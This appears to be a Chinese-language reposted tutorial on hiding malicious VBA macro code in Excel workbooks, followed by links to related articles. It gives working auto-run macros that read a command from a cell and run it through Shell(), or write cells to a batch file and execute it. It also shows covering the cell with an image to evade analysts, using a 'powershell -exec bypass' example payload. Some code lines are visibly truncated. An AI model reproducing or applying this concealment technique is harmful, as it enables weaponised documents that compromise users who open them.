如何在Excel中更好地隱藏惡意宏代碼

2020-12-17 51cto

如何在Excel中更好地隱藏惡意宏代碼

你可能會問,為什麼不簡單地使用實際上不涉及工作簿的代碼,以及主要原因是避免網絡流量。

作者:luochicun來源:嘶吼網|2020-10-04 11:25

你可能會問,為什麼不簡單地使用實際上不涉及工作簿的代碼,以及主要原因是避免網絡流量。當然,你可以簡單地添加宏,這些宏會將每行代碼添加到一個新文件中,以避免網絡流量,但是這樣做會使活動對於任何分析文檔的人來說都是顯而易見的,他們會在查看時立即看到新的代碼行宏。使用這種方法,它使得對惡意文檔的分析稍微困難一些,但是當然不是很多。

注意:僅對文檔運行oledump或olevba之類的工具將返回宏。

此時你會看到,該宏正在從特定列中提取代碼並使用Shell()執行該代碼,但該代碼顯然非常可疑:

而且,如果我們導航到代碼所在的BG1,我們不會立即看到任何可疑的東西:但是,如果將滑鼠懸停在BG1上(或者稍微靠近一下並注意到未對齊的列),那麼你會看到在代碼上覆蓋了一個圖像:

顯然,更有耐心的人可以完善空列的屏幕截圖,並將其覆蓋在代碼頂部以使其不那麼引人注意。揭示從工作表中提取的代碼的另一種方法是使用MsgBox:

1. 一組要覆蓋在代碼頂部的空列的屏幕截圖,例如:

2. 從工作簿中提取代碼並運行數據的宏:

  1. Private Sub Workbook_Open() 
  2. Data = Sheet1.Range("BG1"
  3. Shell(Data) 
  4. End Sub 

Data = Sheet1.Range("BG1")僅查看位於BG1的行,提取該行中的所有內容並將其放在變量Data中。

3. 打開文檔並在用戶單擊「啟用內容」後將提取並執行的代碼。

  1. powershell.exe -exec bypass -C echo "Hello world" > C:\Users\Desktop\Conduct\Desktop\test.txt 

將代碼插入所需的任何列後,只需將空列的圖像插入代碼上方(插入>插圖>圖片)。

然後將宏插入ThisWorkbook並更改Range()部分以與你的列匹配。因此,如果你將數據插入A列並且位於第一行,它就是Range("A1")。

將多行寫入文件

向文件寫入多行只是小菜一碟,只需要添加幾行代碼即可。

使用的宏代碼如下所示:

  1. Private Sub Workbook_Open() 
  2. 1. Dim Path As String 
  3. 2. Dim FileNumber As Integer 
  4. 3. FileNumber = FreeFile 
  5. 4. Data = Sheet1.Range("BG1"
  6. 5. Data2 = Sheet1.Range("BG2"
  7. 6. Path = "test.bat" 
  8. 7. Open Path For Output As FileNumber 
  9. 8.    Print #FileNumber, Data 
  10. 9.    Print #FileNumber, Data2 
  11. 10.    Close FileNumber 
  12. 11. Shell(Path) 
  13. End Sub 

第1-3行是靜態的,保持原樣,它們只是定義使用的變量。第4-6行是動態的。你將需要根據excel工作表將4和5中的字符串更改為代碼所在的位置。將第6行更改為所需的文件路徑。

第7-9行也是動態的,它們僅打開文件並將已提取的數據寫入文件。特別是第8和9行是負責將數據寫入文件的行。

只需將要寫入文件的代碼插入到工作簿中,並記下該文件所在的列和行,並更改Data&Data1變量以與你的列和行匹配(如果需要的話,添加更多的變量)。然後,將工作簿中的代碼與空行的屏幕截圖疊加,然後開始就可以了!

【編輯推薦】

【責任編輯:

華軒

TEL:(010)68476606】

點讚 0

相關焦點

  • 一文淺析Office惡意宏代碼如何隱藏和破解
    含有惡意宏的Office附件在APT攻擊、勒索病毒等攻擊事件中被廣泛使用,黑客在製作惡意宏時通常會使用一些技巧來隱藏宏代碼,防止安全人員對宏代碼直接進行分析。
  • 惡意代碼分析之Office宏代碼分析
    基於宏的攻擊活動目前利用office宏進行攻擊應該是一個比較主流的攻擊方式了,但是通常情況下,宏代碼並不能很好地實現所有的功能,更多的時候,宏代碼都是作為一個加載器或者下載器載攻擊中發揮作用的。有時候,宏代碼會直接訪問攻擊者的C2,下載惡意文件到本地運行。
  • 乾貨 | 惡意代碼分析之Office宏代碼分析
    基於宏的攻擊活動目前利用office宏進行攻擊應該是一個比較主流的攻擊方式了,但是通常情況下,宏代碼並不能很好地實現所有的功能,更多的時候,宏代碼都是作為一個加載器或者下載器載攻擊中發揮作用的。有時候,宏代碼會直接訪問攻擊者的C2,下載惡意文件到本地運行。
  • 宏如何使用?--excel的學習
    如果你已經用excel很長時間了,那麼您一定聽過宏這個名稱,很多人都不知道宏是用來幹什麼的,今天我們就來了解一下excel中宏的作用與幫助,如果您經常在excel中重複一個任務,那就可以用宏來自動執行該任務了。
  • excel中重複製作圖表如何錄製宏
    excel中重複製作圖表如何錄製宏 在工作中執行多次重複操作,可以使用宏功能簡化操作,提高工作效率,宏是一系列存儲在VBA模塊中的命令和函數,一旦編輯就可以隨時調用減少執行重複操作的時間,現在簡單的用圖文描述一下錄製宏操作流程
  • 比較Excel中的宏和VBA
    在Excel中可以錄製一個宏來快速製作學生成績的抬頭,我們簡單回顧一下這個宏是如何錄製的:1) 首先點擊「開發工具」選項卡;2) 點擊「使用相對引用」;3) 在錄製開始前選中第一行的抬頭;4) 點擊「錄製宏」;5) 複製第一行;6) 隔兩行,也就是在第3行右鍵滑鼠,選中「插入複製的單元格」;7) 點擊「
  • Excel表格中,你千萬別學「宏",我是認真的.
    如上,你在Excel中進行的一系列的操作過程,就是一個宏。比如:批量取消工作表隱藏批量合作多個工作表或Excel文件批量.有難題就需要有解決辦法,怎麼辦,怎麼辦? 有辦法。就是Excel中沒有的功能,我們自已添加,也就是我們自已編寫可以完成指定功能的宏。就象Excel內置功能一樣,可以供我們隨時使用。
  • Excel用3行代碼編程實現任何功能——編寫宏
    01【excel是什麼?】也不怪你不低調,因為你那兩招和別人就不一樣,你上來就玩的是代碼,而且還3句代碼搞定人家搞不定的事情!並且我們想隨時各個Excel裡面使用,又不知道如何復用!Of cause! 我們編寫一個宏任務,給他定義上代碼,只需要3行代碼就可以搞定這個任務,並且由於有了宏任務的代碼,以後其他的Excel,隨時用!
  • 微軟Excel VBA宏的介紹及如何錄製宏
    現excel版本採的宏語是VBA(Visual Basic for Applications)。二,宏的運原理在Excel中使用VBA語編寫的些語句和代碼,叫做宏。我們通過執由這些語和代碼組成的宏可以完成些特別的操作。錄製宏就是把這些動作VB語記錄下來,如果我們需要執這些重複的操作,我們只需要執宏就可以了。
  • Excel VBA(宏)有多強大?看了這幾個Excel功能就服了!
  • Excel問題代碼列表
  • 你知道excel的宏可以事半功倍提升工作效率嗎
    工作中經常使用excel的同學會發現,如果說每天對對同樣的工作內容,表格的處理方法也是一樣的。有可能你還是會繼續重複「昨天的故事」,一次又一次的重複操作。這樣難免會有些許枯燥,這時候,如果你本身會excel的宏。
  • Excel隱藏行列、工作簿窗口與Sheet及取消全部行列與Sheet隱藏
    把行列、工作簿窗口和 Sheet 隱藏後,如果想重新顯示它們,可以取消隱藏,並且也可以一次取一個或一次取消全部。行列可以用簡單的操作實現一次取消全部隱藏,然而,Sheet 需要用宏 VBA 實現。以下是Excel隱藏與取消一行一列與多行多列、工作簿窗口與Sheet及一次取消隱藏全部Sheet的具體操作方法,操作中所用版本為 Excel 2016。
  • Excel表格的宏操作教程
    諮詢學歷提升請加小編個人微信號:jzs0598 ❸ 長按右側二維碼,關注CAD吧excel表格的宏操作教程:  宏操作步驟1:為了深入淺出,小編操作了一個最簡單的實操過程,希望大家不要。  宏操作步驟2:其實,不用怕,我們要用到「宏」來幫助我們。首先,我們要錄製新的宏,簡單而言就是把我們要重複操作的步驟錄製起來哦! 方法是:點擊工具——宏——錄製新的宏。點擊後,你就開始進入宏的錄製了,把你步驟一步步錄起來!
  • Excel技能樹系列09:宏與VBA
    在這篇文章中,鄙人將會列出一些非常實用的VBA代碼,讓你的Excel表格處理工作大大加快,節省下很多的時間用來幹更有意思的事情。主要還是Excel中的大量重複性工作都可以自動交由VBA來完成。這些都是非常實用的代碼,拿來稍微改一下就能夠勝任你的工作。整理在你的私人工具庫裡面,用的時候直接調用,大大方便自己的工作。
  • 無需VBA代碼,巧用錄製宏,30秒製作一個Excel高級查詢小程序
    2行輸入條件數據,如果篩選的時候第2行被隱藏了,後面沒法輸入條件了。所以為了確保第2行不被隱藏,把原始數據下拉了一行處理。2、錄製宏關鍵在於這一步,我們在開發工具中,點擊錄製宏然後在數據選項卡下,點擊高級篩選,在彈出的窗口中,原有列表數據,選擇A2:D18條件區域選擇F1:I2,點擊確定在開發工具中,停止錄製宏
  • 如何在Excel中利用宏進行一次性輸入
    2. 點擊對話框的「編輯」打開VBA代碼窗口。 4. 在代碼「Sub 學生成績條()」的後面添加如圖所示的代碼。
  • 如何錄製宏及如何利用已經錄製好的宏
    今日的內容是第一章「初識VBA代碼及應用VBA代碼」的第四節「如何錄製宏及如何利用已經錄製好的宏」,「VBA之EXCEL應用」從簡單的錄製宏實現一直講到窗體的搭建,大家可以非常容易的掌握相關的知識,這套教程面向初學人員,共三冊,十七章,都是我們在利用EXCEL工作過程中需要掌握的知識點,希望大家能掌握利用。
  • 如何快速把多個excel表格合併成一個excel表
    如何快速把多個excel表格合併成一個excel表呢? 首先,我們需要把多個excel表都放在同一個文件夾裡面,並在這個文件夾裡面新建一個excel文件。
  • excel表格如何隱藏公式? excel表格隱藏公式方法
    excel表格如何隱藏公式?平時在使用excel做表格的時候會需要使用的一些公式,而又不希望公式被人看到,這個時候就可以把公式隱藏掉,讓它不出現在表格中。下面就一起來看看!步驟1在工作表中選中要隱藏公式的單元格或區域,單擊「開始」選項卡的「字體」組右下角的功能擴展按鈕。步驟2彈出「設置單元格格式」對話框,切換到「保護」選項卡,勾選「隱藏」複選框,然後單擊「確定」按鈕。